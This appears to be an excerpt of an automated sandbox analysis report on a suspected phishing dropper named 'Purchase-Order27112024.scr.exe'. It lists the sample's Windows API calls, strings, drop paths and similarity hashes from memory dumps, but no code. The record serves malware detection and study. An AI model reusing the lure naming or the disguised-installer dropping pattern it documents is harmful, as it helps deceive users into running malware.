• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 1638840714-813528018
• Opcode ID: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
• Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
• Opcode Fuzzy Hash: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
• Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404684
• SetWindowTextW.USER32(00000000,?), ref: 004046AE
• SHBrowseForFolderW.SHELL32(?), ref: 0040475F
• CoTaskMemFree.OLE32(00000000), ref: 0040476A
• lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
• lstrcatW.KERNEL32(?,Call), ref: 004047A8
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
  • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
  • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
  • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
  • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
  • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
• GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
• SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
• String ID: A$C:\Users\user\AppData\Local\googly\pulsation$Call$&B
• API String ID: 2246997448-1352790449
• Opcode ID: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
• Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
• Opcode Fuzzy Hash: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
• Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                                                                      APIs
                                                                                                      • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\googly\pulsation, xrefs: 004020FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: CreateInstance
• String ID: C:\Users\user\AppData\Local\googly\pulsation
• API String ID: 542301482-4003725227
• Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
• Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
• Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54
APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
• Instruction ID: 2908b39070a7deba1428861388b98b097f8f9174a2682adf846a4f1dff5e2c07
• Instruction Fuzzy Hash: D5F05EB16101149BCB00DBA4DD499BEB378FF04318F3005BAE151F31D0D6B859409B2A
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
• GetDlgItem.USER32(?,000003E8), ref: 004043E9
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
• GetSysColor.USER32(?), ref: 00404417
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
• lstrlenW.KERNEL32(?), ref: 00404438
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
• GetDlgItem.USER32(?,0000040A), ref: 004044B3
• SendMessageW.USER32(00000000), ref: 004044BA
• GetDlgItem.USER32(?,000003E8), ref: 004044E5
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
• LoadCursorW.USER32(00000000,00007F02), ref: 00404536
• SetCursor.USER32(00000000), ref: 00404539
• ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
• LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
• SetCursor.USER32(00000000), ref: 0040455D
• SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
• SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: Call$N$open
• API String ID: 3615053054-2563687911
• Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
• Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
• Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
APIs
• lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
• CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
• GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
  • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
  • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
• GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
• wsprintfA.USER32 ref: 00405CDE
• GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
• GlobalFree.KERNEL32(00000000), ref: 00405DCF
• CloseHandle.KERNEL32(00000000), ref: 00405DD6
  • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,80000000,00000003), ref: 00405BB8
  • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
• String ID: %ls=%ls$NUL$[Rename]
• API String ID: 1265525490-899692902
• Opcode ID: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
• Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
• Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
• Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
• Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
• CharNextW.USER32(?,?,?,00000000), ref: 0040624E
• CharNextW.USER32(?,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
• CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
Strings
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-3339399756
• Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
• Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
• Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
APIs
• WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsl791D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
• lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsl791D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
• WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
Strings
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                      • String ID: 8$C:\Users\user\AppData\Local\Temp\nsl791D.tmp$C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll
                                                                                                      • API String ID: 1453599865-3361959198
                                                                                                      • Opcode ID: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                                                                      • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                                                                      • Opcode Fuzzy Hash: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                                                                      • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 0040421E
• GetSysColor.USER32(00000000), ref: 0040423A
• SetTextColor.GDI32(?,00000000), ref: 00404246
• SetBkMode.GDI32(?,?), ref: 00404252
• GetSysColor.USER32(?), ref: 00404265
• SetBkColor.GDI32(?,?), ref: 00404275
• DeleteObject.GDI32(?), ref: 0040428F
• CreateBrushIndirect.GDI32(?), ref: 00404299
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
• Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
• Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
• Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
• GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
• WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
• GlobalFree.KERNEL32(00000000), ref: 00402877
• CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Global$AllocFileFree$CloseDeleteHandleWrite
• String ID:
• API String ID: 3294113728-0
• Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
• Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
• Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
• Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
APIs
• DestroyWindow.USER32(00000000,00000000), ref: 00402D35
• GetTickCount.KERNEL32 ref: 00402D53
• wsprintfW.USER32 ref: 00402D81
  • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
  • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
  • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
  • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll), ref: 0040525F
  • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
  • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
  • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
• CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
• ShowWindow.USER32(00000000,00000005), ref: 00402DB3
  • Part of subcall function 00402CFE: MulDiv.KERNEL32(00010000,00000064,00015210), ref: 00402D13
Strings
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
• Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
• Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
• Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
• Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
• GetMessagePos.USER32 ref: 00404ADF
• ScreenToClient.USER32(?,?), ref: 00404AF9
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
Strings
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
• Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
• Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
• Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
• wsprintfW.USER32 ref: 00402CD1
• SetWindowTextW.USER32(?,?), ref: 00402CE1
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: unpacking data: %d%%$verifying installer: %d%%
• API String ID: 1451636040-1158693248
• Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
• Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
• Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
